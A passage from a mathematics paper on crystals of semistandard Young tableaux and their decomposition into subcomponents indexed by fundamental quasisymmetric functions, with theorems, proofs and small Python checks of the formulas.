no "nice" formula exists, given the chaotic behavior of those numbers [Stanley and Fomin, 1999] (see the discussion on mathoverflow on this question [Morales, 2010], viewed a thousand times and with contributions from experts). 
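The formula of Theorem 3 is easy to check by brute force on small shapes; the sketch below (our own illustration, exponential in \(|\lambda|\) and only meant for tiny examples) enumerates standard tableaux to obtain the numbers \(f_{d}^{\lambda}\) and compares the resulting count with a direct enumeration of semistandard tableaux.

```
from itertools import product
from math import comb

def standard_tableaux(shape):
    """Enumerate standard Young tableaux of `shape` (a partition) as tuples of rows."""
    cells = sum(shape)
    def extend(tab):
        if sum(len(r) for r in tab) == cells:
            yield tuple(tuple(r) for r in tab)
            return
        k = 1 + sum(len(r) for r in tab)            # next entry to place
        for i in range(len(shape)):
            if len(tab[i]) < shape[i] and (i == 0 or len(tab[i - 1]) > len(tab[i])):
                tab[i].append(k)
                yield from extend(tab)
                tab[i].pop()
    yield from extend([[] for _ in shape])

def descents(tab):
    """Entries i such that i + 1 sits in a strictly lower row."""
    row = {v: i for i, r in enumerate(tab) for v in r}
    return [i for i in range(1, sum(map(len, tab))) if row[i + 1] > row[i]]

def count_ssyt(shape, n):                           # right-hand side of Theorem 3
    m, total = sum(shape), 0
    for t in standard_tableaux(shape):
        d = len(descents(t))
        if n - d - 1 >= 0:                          # terms with too many descents vanish
            total += comb(m + n - d - 1, n - d - 1)
    return total

def count_ssyt_bruteforce(shape, n):                # direct enumeration, for comparison
    m, count = sum(shape), 0
    for fill in product(range(1, n + 1), repeat=m):
        rows, k = [], 0
        for length in shape:
            rows.append(fill[k:k + length])
            k += length
        ok = all(r[j] <= r[j + 1] for r in rows for j in range(len(r) - 1))
        ok = ok and all(rows[i][j] < rows[i + 1][j]
                        for i in range(len(rows) - 1) for j in range(len(rows[i + 1])))
        count += ok
    return count

print(count_ssyt((2, 1), 3), count_ssyt_bruteforce((2, 1), 3))   # both give 8
```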
There is however a known combinatorial formula below, using descents, which had only a bijective proof. The setting of quasicrystals allowed us to give it a constructive proof. **Proposition 0.1 (Proposition 3.12 [Sagan, 2001, Proposition 5.3.6] ) :** The Kostka number \(K_{\mu}^{\lambda}\) counting tableaux of shape \(\lambda\) and composition weight \(\mu\) is given by the following formula, where \(\alpha\preccurlyeq\mu\) if \(\mu\) is a refinement of \(\alpha\). \[K_{\mu}^{\lambda}=|\{T\in SYT(\lambda)\ |\ DesComp(T)\preccurlyeq\mu\}|\] After studying the structure of the quasicrystals \(B(\alpha)\), we go back to studying the structure of the crystal \(B(\lambda)\). **Theorem 4 :** Subcomponents \(B(T_{\alpha})\) and \(B(T_{\stackrel{{\mbox{\tiny-}}}{{\alpha}}})\) necessarily appear in pairs in a given crystal \(B(\lambda)\). They are then dual one to another (as graphs) and are positionned in dual locations within \(B(\lambda)\), with the anti-automorphism of crystal between both being the evacuation map. By replacing each subcomponent \(B(T_{\alpha})\) in \(B(\lambda)_{n}\) by the associated standard tableau, and preserving only the edges of minimal index between subcomponents, we obtain what we call the skeleton of \(B(\lambda)_{n}\), denoted \(Skeleton(\lambda)_{n}\). **Theorem 5 :** For \(\lambda\vdash m\) fixed, let \(S\) be the maximal length of a descent composition for tableaux of shape \(\lambda\). Then the skeletons \(Skeleton(\lambda)_{n}\) of the crystals \(B(\lambda)_{n}\) are equal for all \(n\geq S\). For \(1\leq n\leq S\), the skeleton of \(B(\lambda)_{n}\) is the induced subgraph of \(Skeleton(\lambda)_{S}\) containing standard tableaux of shape \(\lambda\) with descent composition having at most \(n\) parts. The skeleton is then determined for all \(n\), and we can define \(Skeleton(\lambda)=Skeleton(\lambda)_{S}\) to be the skeleton of \(B(\lambda)\), thus giving its underlying structure. We conjecture that the (unoriented and unlabelled) graph structure of the skeleton contains that of the dual equivalence graph for \(\lambda\), introduced by Assaf [3] (see conjecture 5.3). We also conjecture that the induced subgraph of the skeleton holding standard tableaux with fixed number of descents have interesting structures (see conjecture 4.10). The third aim of the article is to give some applications to plethysm of the results above (see section 6), notably counting monomials in plethysms \(s_{\mu}[s_{\lambda}]\) and understanding how a (symmetric) sum of quasicrystals can be regrouped into connected components associated to Schur functions. To do the latter, we introduce an elegant algorithm. This algorithm is not more efficient than others curently in use, but its structure may help understand better plethysm. Figure 1 illustrates the corresponding connected components of crystals of \(GL_{n}\) on words and tableaux, with words appearing as skew tableaux whose rows are their maximal weakly increasing factors. Figure 1: Isomorphic connected components of crystals on words and tableaux Background ### Crystals on words Recall that a _word (of length \(k\) on \(n\))_ is a sequence of \(k\) letters \(w\in[n]^{\otimes k}\) on the alphabet \([n]=\{1,2,\ldots,n\}\). We say a word \(w\) has _weight_\(\beta=(\beta_{1},\beta_{2},\ldots,\beta_{n})\) where \(\beta_{i}\) counts occurences of the letter \(i\) in \(w\). One can define _crystal operators \(e_{i}\) and \(f_{i}\) on words_, for \(1\leq i<n\). 
A general description is that \(e_{i}\) changes a letter \(i+1\) into an \(i\), or is null, while \(f_{i}\) changes an \(i\) into an \(i+1\), or is null, and if \(e_{i}\), \(f_{i}\) are not null, then \(e_{i}\circ f_{i}=f_{i}\circ e_{i}=Id\). The exact action of \(e_{i}\) and \(f_{i}\) on words is described using the following _parenthesis rule_:

1. Each letter \(i\) is associated to a parenthesis ), and each letter \(i+1\), to a parenthesis (.
2. Coupled parenthesis are removed to obtain a sequence of uncoupled parenthesis )\({}^{\phi_{i}}\)(\({}^{\epsilon_{i}}\).
3. \(e_{i}\) acts on the letter \(i+1\) corresponding to the leftmost uncoupled parenthesis (, and \(f_{i}\) acts on the letter \(i\) corresponding to the rightmost uncoupled parenthesis ).

**Example 1.1 :** Let \(w=1331233312233\), and \(i=1\). Reading \(w\) from left to right, its letters \(1\) and \(2\) give the parenthesis sequence ) ) ( ) ( (, which is reduced to ) ) ( ( by removing coupled parenthesis, so \(\phi_{1}=\epsilon_{1}=2\). The rightmost uncoupled ) corresponds to the \(1\) in position \(4\), and the leftmost uncoupled ( corresponds to the \(2\) in position \(10\). Then \(f_{1}(w)=1332233312233\) and \(e_{1}(w)=1331233311233\). A _crystal on words_ is then a labelled oriented graph on words where the edges \(w\to w^{\prime}\) are labelled by \(i\) if \(f_{i}(w)=w^{\prime}\). See Figure 1 for an example of a crystal on words. ### Crystals on tableaux #### 1.2.1 Tableaux and Schur functions Recall that _partitions_ are weakly decreasing positive integer vectors \(\lambda=(\lambda_{1},\lambda_{2},\ldots,\lambda_{\ell})\). If the sum of the parts of \(\lambda\) gives \(m\), then we say that \(\lambda\) is a _partition of \(m\)_, noted \(\lambda\vdash m\) or \(|\lambda|=m\), and use \(\ell(\lambda)=\ell\) to denote its number of parts, or length. We identify the partitions with their _Young diagram_, the top- and left-justified array of boxes with \(\lambda_{i}\) boxes in the \(i^{th}\) row. A _tableau of shape \(\lambda\)_ is a filling of the cells of \(\lambda\) with integers. We say that a tableau is _semistandard_ if the entries weakly increase along rows from left to right, and increase down columns. A tableau is said to be _standard_ if it is semistandard and entries \(1\) to \(|\lambda|\) appear exactly once. Unless otherwise stated, we use the word tableau for semistandard tableau. The _weight_ (or _filling_) of a tableau is the composition \(\gamma=(\gamma_{1},\gamma_{2},\ldots)\) where \(\gamma_{i}\) counts its entries \(i\). To a tableau it is possible to associate a word by using a fixed reading order. We use the _row reading order_, noted \(rw\): we read rows from left to right, starting with the last row, and ending with the first. **Example 1.2 :** Let \(t\) be the tableau of shape \((5,4,2,1)\) whose rows, from top to bottom, are \(11234\), \(2235\), \(34\), and \(5\); its weight is \((2,3,3,2,2)\). Its row reading word is \(rw(t)=534223511234\). To a tableau \(t\) of weight \(\gamma\), it is also possible to associate the monomial \(x^{t}=x_{1}^{\gamma_{1}}x_{2}^{\gamma_{2}}x_{3}^{\gamma_{3}}\cdots\). This gives the connection between tableaux and _Schur functions_: the Schur function associated to a partition \(\lambda\) is \(s_{\lambda}=\sum_{t\in SSYT(\lambda)}x^{t}\), where \(SSYT(\lambda)\) is the set of all tableaux of shape \(\lambda\).
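The parenthesis rule above is short to implement; the following sketch (our own illustration, using tuples for words) reproduces the computation of Example 1.1.

```
# A short sketch of the parenthesis (bracketing) rule of Section 1.1 for words,
# checked against Example 1.1.

def unpaired(word, i):
    """Positions of unpaired ')' (letters i) and '(' (letters i+1), left to right."""
    closers, openers = [], []          # ')' = letter i,  '(' = letter i+1
    for pos, letter in enumerate(word):
        if letter == i + 1:
            openers.append(pos)
        elif letter == i:
            if openers:
                openers.pop()          # couple this ')' with the nearest '(' to its left
            else:
                closers.append(pos)
    return closers, openers

def f(word, i):
    """Change the letter i of the rightmost unpaired ')' into i+1 (or return None)."""
    closers, _ = unpaired(word, i)
    if not closers:
        return None
    w = list(word)
    w[closers[-1]] = i + 1
    return tuple(w)

def e(word, i):
    """Change the letter i+1 of the leftmost unpaired '(' into i (or return None)."""
    _, openers = unpaired(word, i)
    if not openers:
        return None
    w = list(word)
    w[openers[0]] = i
    return tuple(w)

w = (1, 3, 3, 1, 2, 3, 3, 3, 1, 2, 2, 3, 3)
print(f(w, 1))   # (1, 3, 3, 2, 2, 3, 3, 3, 1, 2, 2, 3, 3)
print(e(w, 1))   # (1, 3, 3, 1, 2, 3, 3, 3, 1, 1, 2, 3, 3)
```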
The cells containing entries \(i\) in a tableau form a _horizontal band_: each column contains at most one entry \(i\), and reading the tableau left to right, each new cell with content \(i\) must be weakly North-East (NE) to the preceeding ones. We say the NE-most cell of a horizontal band is its head, and its SW-most cell, its tail. We say a horizontal band (containing a certain number of entries, up to entries \(i\)) is _maximal_ if adding the "next" horizontal band (of entries \(i+1\)) is not a horizontal band anymore. We call the set of maximal horizontal bands of a tableau its _minimal parsing_, and say it has _type_\(\alpha\) if the length of the \(i^{\rm th}\) maximal horizontal band is given by \(\alpha_{i}\). Among the tableaux with a fixed minimal parsing of type \(\alpha\), there is a unique one which also has weight \(\alpha\), obtained by filling the \(i^{\rm th}\) maximal horizontal band by entries \(i\), for all \(i\). We denote these tableaux \(T_{\alpha}\). **Example 1.3 :** Let \(T=\young(1,1,3,5)\) and \(T^{\prime}=\young(1,1,2,3,3)\), where the maximal horizontal bands of the two tableaux are distinguished. \(T\) has minimal parsing of type \((2,3,3,1)\), and its horizontal bands (of individual entries \(i\)) are not all maximal. The tableau \(T_{(2,3,3,1)}\) with same minimal parsing appears in example 1.5. For its part, \(T^{\prime}\) has minimal parsing of type \((2,3,6)\), and all its horizontal bands are maximal. It is then equal to \(T_{(2,3,6)}\) for this specific minimal parsing of type \((2,3,6)\). The integer vector \(\alpha=(\alpha_{1},\alpha_{2},\ldots,\alpha_{s})\) giving the length of the maximal horizontal bands in a tableau is what we'll call its _descent composition_. This corresponds to the traditional notion of descent composition (in standard tableaux), as we see below. Using the minimal parsing allows us to _standardize a tableau_: entries in the first maximal horizontal band are relabelled by \(1\) to \(\alpha_{1}\), the ones in the second, by \(\alpha_{1}+1\) to \(\alpha_{1}+\alpha_{2}\), etc. This gives the same result as standardizing a tableau through its reading word, as seen below. For standard tableaux, we can consider their _descents_: entries \(i\) such that \(i+1\) appears in a row of greater index. To descent sets, we can associate bijectively a _descent composition_: if \(\{i_{1}<i_{2}<\ldots<i_{k}\}\) is the descent set of a standard tableau with \(m\) cells, then \(\alpha=(i_{1},i_{2}-i_{1},i_{3}-i_{2},\ldots,m-i_{k})\) is the associated descent composition. It is a composition of \(m\), and gives the lengths of the maximal horizontal bands of the standard tableau. There is then a unique semistandard tableau with weight \(\alpha\) and same minimal parsing as the standard tableau. This gives the following. **Proposition 1.4 :** Semistandard tableaux with minimal parsing of type and weight \(\alpha\) are in bijection with standard tableaux with descent composition \(\alpha\). **Example 1.5 :** The tableau \(T_{(2,3,3,1)}=\young{1123}{223}\) standardizes to \(std(T_{(2,3,3,1)})=\young{1258}{347}\). This standard tableau has descent set \(\{2,5,8\}\), and descent composition \((2,3,3,1)\). The descent composition then gives the lengths of the maximal horizontal bands in \(T_{(2,3,3,1)}\) and \(std(T_{(2,3,3,1)})\). Note that all tableaux with the same minimal parsing of type \((2,3,3,1)\), like the tableau \(T\) in example 1.3, standardize to \(std(T_{(2,3,3,1)})\). 
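As a small illustration of the passage from descent sets to descent compositions just described, here is a hedged Python sketch (our own code, and the tableau used below is our own small example, not the one of Example 1.5): it computes the descent composition of a standard tableau given as a list of rows, top row first.

```python
def descent_composition(t):
    """Descent composition of a standard tableau t (list of rows, top row first):
    i is a descent when i+1 lies in a row of greater index."""
    row_of = {entry: r for r, row in enumerate(t) for entry in row}
    m = len(row_of)
    cuts = [0] + [i for i in range(1, m) if row_of[i + 1] > row_of[i]] + [m]
    return [b - a for a, b in zip(cuts, cuts[1:])]

# a standard tableau of shape (3,2,1) with descent set {2,5},
# hence descent composition (2,3,1)
assert descent_composition([[1, 2, 5], [3, 4], [6]]) == [2, 3, 1]
```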
We will see in section 1.3 that descent compositions are used to define fundamental quasisymmetric functions, which are central to our study. The _descents of a word_\(w\) are the positions \(i\) such that \(w_{i}>w_{i+1}\). The descent composition of a word \(w\) corresponds to the lengths of maximal weakly increasing factors in \(w\). Words can then be standardized uniquely in a way that preserves descents: entries \(i\) of \(w\) are replaced from left to right by entries \(\beta_{1}+\beta_{2}+\ldots+\beta_{i-1}+1\) to \(\beta_{1}+\beta_{2}+\ldots+\beta_{i}\), where \(\beta_{j}\) counts letters \(j\) in \(w\). A tableau \(T\) can be standardized by standardizing its reading word \(rw(T)\), which gives the same result as above. #### 1.2.2 Crystals of tableaux _Crystal operators_ on tableaux are defined as applying the (word) crystal operators on its reading word, and changing the corresponding entry in the tableau. Tableaux obtained in this way are always semistandard [10]. These crystal operators define an oriented graph structure on the set of semistandard tableaux, where there is an arrow from \(T\) to \(T^{\prime}\) labelled \(i\) if \(T^{\prime}=f_{i}(T)\). Since only entries change and the shape is fixed, the connected components regroup all the tableaux of the same shape \(\lambda\) which we denote \(B(\lambda)_{n}\) if the fixed maximal entry is \(n\). It then corresponds to the irreducible character \(\chi^{\lambda}\) of \(GL_{n}\) given by the Schur function \(s_{\lambda}(x_{1},x_{2},\ldots,x_{n})\). More generally, we can also consider the infinite graph \(B(\lambda)\) corresponding to \(s_{\lambda}\). The unique source vertex of \(B(\lambda)\) (and any \(B(\lambda)_{n}\)) is the tableau of shape and filling \(\lambda\), which we denote \(1_{\lambda}\). Note that it corresponds to \(T_{\lambda}\). For example, \(1_{(5,4,2)}=T_{(5,4,2)}=\)\(\young(1,1,1,1,1)\)\(\young(2,2,2,2)\). Crystals of tableaux are especially important to study, because any connected crystal of type \(A_{n-1}\) is isomorphic to a crystal of tableau: **Theorem 1.6** ([Bump and Schilling, 2017]): **:** For any connected Stembridge crystal \(C\) for \(GL_{n}(\mathbb{C})\) (of type \(A_{n-1}\)), there is a unique source. Its weight is a partition \(\lambda\) and \(C\simeq B(\lambda)\). Crystals of words and of tableaux are strongly linked through the Robinson-Schensted-Knuth (RSK) algorithm, jeu de taquin, and the plactic and coplactic monoids (see section 5). ### Fundamental quasisymmetric functions and descent compositions The ring of quasisymmetric functions \(QSym\), introduced by Gessel, generalizes and contains the ring of symmetric functions [Gessel, 1984]. We will consider the basis of \(QSym\) given by the _fundamental quasisymmetric functions_, which are indexed by compositions: \[F_{\alpha}=\sum_{\alpha\prec\beta}M_{\beta},\,\mbox{where}\,\,M_{\beta}=\sum_{ i_{1}<i_{2}<\ldots<i_{k}}x_{i_{1}}^{\beta_{1}}x_{i_{2}}^{\beta_{2}}\ldots x_{i_{k}}^{ \beta_{k}},\] and \(\alpha\preccurlyeq\beta\) indicates that \(\beta\) is a refinement of \(\alpha\): adjacent parts of \(\beta\) can be summed to obtain \(\alpha\). The \(M_{\beta}\) are _monomial quasisymmetric functions_, and also form a basis of \(QSym\). For example, \(\beta_{1}=(2,1,3,2,4,1)\) and \(\beta_{2}=(1,1,3,1,2,1,1,1,1,1,)\) are distinct, but incomparable, refinements of \(\alpha=(2,4,2,5)\). Therefore \(M_{\beta_{1}}\) and \(M_{\beta_{2}}\) both appear in \(F_{\alpha}\). 
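Both the refinement order \(\preccurlyeq\) and descent compositions of words are easy to compute. The short Python sketch below is our own illustration (the helpers `refines` and `word_descent_composition` are not from the article); it checks the refinement example above and computes the descent composition of the reading word \(rw(t)=534223511234\) from Example 1.2, whose maximal weakly increasing factors are, in this case, exactly the rows of \(t\) read from bottom to top.

```python
def refines(alpha, beta):
    """True if beta is a refinement of alpha (alpha ≼ beta):
    consecutive parts of beta can be summed to recover the parts of alpha."""
    i = 0
    for part in alpha:
        total = 0
        while total < part and i < len(beta):
            total += beta[i]
            i += 1
        if total != part:
            return False
    return i == len(beta)

def word_descent_composition(w):
    """Lengths of the maximal weakly increasing factors of the word w."""
    comp, run = [], 1
    for a, b in zip(w, w[1:]):
        if a > b:                   # a descent of the word
            comp.append(run)
            run = 1
        else:
            run += 1
    return comp + [run]

alpha = (2, 4, 2, 5)
assert refines(alpha, (2, 1, 3, 2, 4, 1))                               # beta_1 above
assert refines(alpha, (1, 1, 3, 1, 2, 1, 1, 1, 1, 1))                   # beta_2 above
assert not refines((2, 1, 3, 2, 4, 1), (1, 1, 3, 1, 2, 1, 1, 1, 1, 1))  # incomparable

# reading word of the tableau t from Example 1.2
assert word_descent_composition([5, 3, 4, 2, 2, 3, 5, 1, 1, 2, 3, 4]) == [1, 2, 4, 5]
```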
Schur functions (which are also quasisymetric functions) then decompose in the basis of fundamental quasisymmetric functions. We will use the decomposition below, proved recently by Gessel in a short article [Gessel, 2019], by using horizontal bands in standard tableaux, there called runs, and an involution acting on them. \[s_{\lambda}=\sum_{T\in SYT(\lambda)}F_{DesComp(T)}.\] Decomposing a crystal into subcomponents corresponding to fundamental quasisymmetric function We now show how the above formula (\(*\)) expressing \(s_{\lambda}\) as a sum of fundamental quasisymmetric functions \(F_{\alpha}\) induces a decomposition of the crystal of tableaux \(B(\lambda)\). Each subcomponent of the decomposition would then correspond precisely to one of the \(F_{\alpha}\) appearing in (\(*\)). We remark that crystal operators on tableaux do not necessarily preserve descent compositions. This is because changing the value of entries can modify the maximal horizontal bands along with the weight of the tableau. However, tableaux of the same parsing will be grouped together in connected subcomponents of \(B(\lambda)\): **Proposition 2.1 :** The set of tableaux of shape \(\lambda\) with a fixed parsing of type \(\alpha\) form a connected induced subgraph of \(B(\lambda)\). Its source is the tableau \(T_{\alpha}\) with filling and (same) minimal parsing of type \(\alpha\), and its vertices give the monomials appearing in \(F_{\alpha}\). An example of the decomposition can be seen in figure 2. Proof.: Let's consider the definition of \(F_{\alpha}\). If \(T_{\alpha}\) is a tableau of filling and parsing into horizontal bands of type \(\alpha\), then \(x^{T_{\alpha}}=x^{\alpha}\) appears in \(M_{\alpha}\subseteq F_{\alpha}\), since \(\alpha\preccurlyeq\alpha\). Now, any refinement \(\alpha\preccurlyeq\beta\) gives a (non-)minimal parsing of the same maximal horizontal bands. Any filling \(\gamma\) obtained from \(\beta\) by (potentially) adding zero parts gives a valid filling of the same (non-)maximal horizontal bands, and the associated monomial will appear in \(M_{\beta}\). In particular, \(\alpha\preccurlyeq\beta\preccurlyeq\gamma\). Therefore, the set of tableaux of shape \(\lambda\) with fixed minimal parsing of type \(\alpha\) (and any weight \(\alpha\preccurlyeq\gamma\)) gives all monomials of \(F_{\alpha}\). Crystal operators \(f_{i}\), for \(1\leq i\leq n-1\), modify the weight of tableaux by \(b_{i+1}-b_{i}\), where \(b_{i}\) is the vector with zeros everywhere except in position \(i\). If a tableau \(T\) of weight \(\gamma\) has minimal parsing of type \(\alpha\), then \(f_{i}(T)\) has the same parsing if and only if \(\alpha\preccurlyeq\gamma+(b_{i+1}-b_{i})\). This follows from the above discussion. The set of tableaux with the same minimal parsing, and so the same descent composition \(\alpha\), form a subset of the vertices of \(B(\lambda)\). Among these tableaux, there is only one with filling \(\alpha\), \(T_{\alpha}\). We will now show that every tableau in the subset of vertices can be obtained by a certain sequence of crystal operators from \(T_{\alpha}\), thus showing that the induced subgraph is connected, and that \(T_{\alpha}\) is its source. Let \(T\) be a tableau of weight \(\gamma\) with the same parsing of type \(\alpha\), then there is a set of sets of consecutive parts of \(\gamma\) such that the sum of the parts in every set gives a part of \(\alpha\). 
Let \[\{\{\gamma_{1},\gamma_{2},\ldots,\gamma_{k_{1}}\},\{\gamma_{k_{1}+1},\ldots, \gamma_{k_{2}}\},\ldots,\{\gamma_{k_{s-1}+1},\ldots,\gamma_{k_{s}}\}\}\] be such a set of sets, with \(k_{1}<k_{2}<\ldots<k_{s}=\ell(\gamma)\), so \(\sum_{j=k_{r-1}+1}^{k_{r}}\gamma_{j}=\alpha_{r}\) for \(1\leq r\leq s=\ell(\alpha)\). Then the following sequence of crystal operators applied to \(T_{\alpha}\) gives \(T\): \[\begin{array}{c}(f_{1})^{\gamma_{2}}\circ(f_{2}\circ f_{1})^{\gamma_{3}} \circ(f_{3}\circ f_{2}\circ f_{1})^{\gamma_{4}}\circ\ldots\circ(f_{k_{1}-1} \circ\ldots\circ f_{2}\circ f_{1})^{\gamma_{k_{1}}}\circ\ldots\circ\\ (f_{k_{(j-1)}}\circ\ldots\circ f_{j+1}\circ f_{j})^{\gamma_{k_{(j-1)}+1}} \circ\ldots\circ(f_{k_{j-1}}\circ\ldots\circ f_{j+1}\circ f_{j})^{\gamma_{k }}\circ\ldots\circ\\ (f_{k_{(s-1)}}\circ\ldots\circ f_{s+1}\circ f_{s})^{\gamma_{k_{(s-1)}+1}} \circ\ldots\circ(f_{k_{s}-1}\circ\ldots\circ f_{s+1}\circ f_{s})^{\gamma_{k }}\quad(T_{\alpha})\quad=\quad T.\end{array}\] This sequence changes entries in the last horizontal band first, then in the previous to last, etc. until the entries in the first maximal horizontal band are changed, and the obtained tableau is \(T\). Moreover, it is straightforward to see that every intermediate tableau also has the same minimal parsing into horizontal bands. Finally, the labelled oriented subgraph on tableaux with the same minimal parsing of type \(\alpha\), with labels of edges given by the application of crystal operators which preserve minimal parsing, gives a connected _induced_ subgraph of \(B(\lambda)\). This is because crystal operators which preserve the minimal parsing remain crystal operators, and if there is an edge between two tableaux in the subset, then the crystal operator applied preserves the minimal parsing. \(\blacksquare\) **Remark 2.2 :** The induced subgraphs are not generally crystals. They are however isomorphic (as oriented graphs) to crystals \(B(\mu)\) after re-labelling of vertices and oriented edges, as we will see in section 3. We denote the induced subgraphs of \(B(\lambda)\) with minimal parsing of type \(\alpha\) by \(B(T_{\alpha})\), where the tableaux \(T_{\alpha}\) are the source vertices. Note that there may be many subcomponents associated to the same composition \(\alpha\), which means that \(F_{\alpha}\) occurs more than once in \(s_{\lambda}\). In particular, this is simply because there can be many ways to decompose \(\lambda\) into maximal horizontal bands of respective lengths \(\alpha_{i}\). We will see in the next section that all subcomponents associated to the same composition \(\alpha\) are in fact isomorphic. **Theorem 1 :** The connected crystal \(B(\lambda)_{n}\), of tableaux of shape \(\lambda\) and maximal entry \(n\), is partitionned into disjoint connected induced subgraphs \(B(T_{\alpha})\) which correspond to quasisymmetric functions \(F_{\alpha}(x_{1},\ldots,x_{n})\), where the subsets of vertices are tableaux with a fixed descent composition \(\alpha\). The sources \(T_{\alpha}\) of these subcomponents have filling and minimal parsing of type \(\alpha\). The number \(f_{\alpha}^{\lambda}\) of subgraphs of type \(\alpha\) is the number of standard tableaux of shape \(\lambda\) and descent composition \(\alpha\). **Example 2.3 :** Figure 2 shows the decomposition of \(B(4,3)_{4}\), into subcomponents associated to quasisymmetric functions. Those associated to a descent composition \(\alpha\) appear in the same color as that associated to \(\stackrel{{\leftarrow}}{{\alpha}}\). 
We show in section 4 that pairs of subcomponents associated respectively to descent compositions \(\alpha\) and \(\stackrel{{\leftarrow}}{{\alpha}}\) are positioned dually in the crystal.

Figure 2: Decomposition of \(B(4,3)_{4}\) into its subcomponents associated to fundamental quasisymmetric functions \(F_{\alpha}\): \(s_{(4,3)}=F_{(4,3)}+F_{(3,4)}+F_{(3,3,1)}+F_{(2,4,1)}+F_{(3,2,2)}+2\cdot F_{(2,3,2)}+F_{(2,2,3)}+F_{(1,4,2)}+F_{(1,3,3)}+F_{(2,2,2,1)}+F_{(1,3,2,1)}+F_{(1,2,3,1)}+F_{(1,2,2,2)}\).

Proof of theorem 1.: The minimal parsing is uniquely determined for any tableau, so the sets of tableaux with a given minimal parsing are disjoint. As we have seen above, each of these sets induces a connected subgraph of \(B(\lambda)\) with source \(T_{\alpha}\), and the monomials associated to these tableaux form a quasisymmetric function \(F_{\alpha}\). Finally, the sources \(T_{\alpha}\) are put in bijection with standard tableaux of descent composition \(\alpha\) and same minimal parsing by using proposition 1.4. By the formula of Gessel, this confirms that we get the right number of subcomponents associated to each \(F_{\alpha}\) in \(B(\lambda)\).

**Proposition 2.4 :** Compositions \(\alpha=(\alpha_{1},\alpha_{2},\ldots,\alpha_{s})\) which appear as descent compositions of tableaux in \(B(\lambda)_{n}\), for \(\lambda=(\lambda_{1},\lambda_{2},\ldots,\lambda_{\ell})\vdash m\), have the following properties.

1. \(1\leq\alpha_{i}\leq\lambda_{1}\),
2. \(\alpha_{1}+\alpha_{2}+\ldots+\alpha_{j}\leq\lambda_{1}+\lambda_{2}+\ldots+\lambda_{j}\) for all \(j\),
3. \(s\leq(\lambda_{2}+\lambda_{3}+\ldots+\lambda_{\ell})+1\),
4. \(\ell\leq s\leq n\),
5. \(s\leq m\).

Proof.:

1. The \(\alpha_{i}\)'s describe lengths of maximal horizontal bands, and each has at most one cell in every column of \(\lambda\). Then \(\alpha_{i}\leq\lambda_{1}\), since \(\lambda_{1}\) is the number of columns spanned by \(\lambda\). Moreover, by the maximality of (maximal) horizontal bands, \(\alpha_{i}\geq 1\).
2. In order to be maximal, the horizontal band of \(i\)'s must have its tail on a row of larger index than that on which lies the head of the horizontal band of \((i+1)\)'s. Then the \(j\) first horizontal bands span at most \(j\) rows and their cells.
3. The first horizontal band is necessarily of shape \((\alpha_{1})\). This gives us the \(+1\). The maximal number of horizontal bands possible occurs if every new horizontal band has a single cell on the next non-fully filled row, and the rest of its cells on the rows above.
4. The first inequality follows from the discussion on the second condition. The second inequality follows from the fact that the composition \(\alpha\) also gives the weight of a tableau \(T_{\alpha}\) of shape \(\lambda\) by the above proposition. Then \(s\leq n\), since \(n\) is the maximal entry allowed in tableaux of \(B(\lambda)_{n}\), as a crystal of \(GL_{n}\), and \(\alpha_{s}\) indicates the number of entries \(s\) in a source \(T_{\alpha}\).
5. There cannot be more non-zero parts to the weight of a tableau than the number of cells in it.

**Remark 2.5 :** For \(\lambda\vdash m\) fixed, not all the compositions of \(m\) with the properties above are descent compositions for \(\lambda\). For example, for \(\lambda=(3,3)\), \(\alpha=(1,2,3)\) has all the properties above; however, there is no semistandard tableau of shape \(\lambda\) with minimal parsing \(\alpha\).

**Conjecture 2.6 :** Let \(\lambda\) be the weakly decreasing reordering of the parts of \(\alpha\).
Then \(F_{\alpha}\) occurs in \(s_{\lambda}\). In particular, all reorderings \(\alpha\) of \(\lambda\) appear as descent compositions for \(\lambda\), with \(F_{\alpha}\) in \(s_{\lambda}\). This has been tested, and found to be true, for all compositions of \(m\), untill \(m=6\). Quasicrystal structure of a subcomponent associated to a fundamental quasisymmetric function \(F_{\alpha}\) We have seen in theorem 1 that subcomponents \(B(T_{\alpha})\) associated to a fundamental quasisymmetric function \(F_{\alpha}\) form induced subgraphs of crystals. This notion of induced subgraph of crystal has not been studied by the mathematical community to our knowledge. We push this further by studying the structure of these subcomponents. In this section, we prove that all subcomponents associated to a composition \(\alpha\) are isomorphic, no matter their crystal host \(B(\lambda)_{n}\). We denote that class of subcomponents by \(B(\alpha)_{n}\), and call them _quasicrystals_. The quasicrystals \(B(\alpha)_{n}\) are not crystals of type \(A_{n-1}\), one reason being that they are not self-dual in general. They may however be Kashiwara crystals for other groups. It would be interesting to investigate which groups (and the associated representations) might have such a crystal structure. ### Oriented graph structure of quasicrystals \(B(\alpha)_{n}\) **Theorem 2 :** Let \(\alpha\) be a composition of \(m\) in \(s\) parts. The quasicrystal \(B(\alpha)_{n}\) is isomorphic (as an oriented graph) to \(B(m)\) with maximal entry \(n-s+1\). In particular, the oriented graph structure of \(B(\alpha)_{n}\) is independant of partitions \(\lambda\) for which \(\alpha\) is a descent composition. In order to prove this theorem, we need to introduce the original definition of quasisymmetric functions of Gessel [Gessel, 1984], which is in terms of subsets \(I\subseteq\{1,2,\ldots,m-1\}\). To do this, we use the bijection between descent sets \(I\) and descent compositions \(\alpha\) defined before proposition 1.4: if \(\alpha=(\alpha_{1},\ldots,\alpha_{s})\), then the associated set is \(I_{\alpha}=\{j_{1},j_{2},\ldots,j_{s-1}\}\) where \(j_{i}=\alpha_{1}+\ldots+\alpha_{i}\). Then \[F_{\alpha}(x_{1},\ldots,x_{n})=F_{I_{\alpha}}(x_{1},\ldots,x_{n})=\sum_{ \begin{subarray}{c}1\leq i_{1}\leq i_{2}\leq\ldots\leq i_{m}\leq n\\ \text{with }i_{j}<j_{j+1}\text{ if }j\in I_{\alpha}\end{subarray}}x_{i_{1}}x_{i_{2}} \ldots x_{i_{m}}.\] This definition is more generally used in the literature as the one given in the introduction. Proof of theorem 2.: A subcomponent \(B(T_{\alpha})\) in any crystal \(B(\lambda)_{n}\) corresponds to the quasisymmetric function \(F_{\alpha}(x_{1},\ldots,x_{n})\), since we restrict ourselves to a maximal entry \(n\). The tableaux in the crystal \(B(m)_{n-s+1}\) have a unique descent composition, \(\alpha=(m)\). Then, the whole crystal corresponds to the quasisymmetric function \(F_{(m)}(x_{1},\ldots,x_{n-s+1})\). Lets start by showing that the sets of monomials associated to both quasisymmetric functions above are in bijection. To do this, we use the original definition of quasisymmetric functions. 
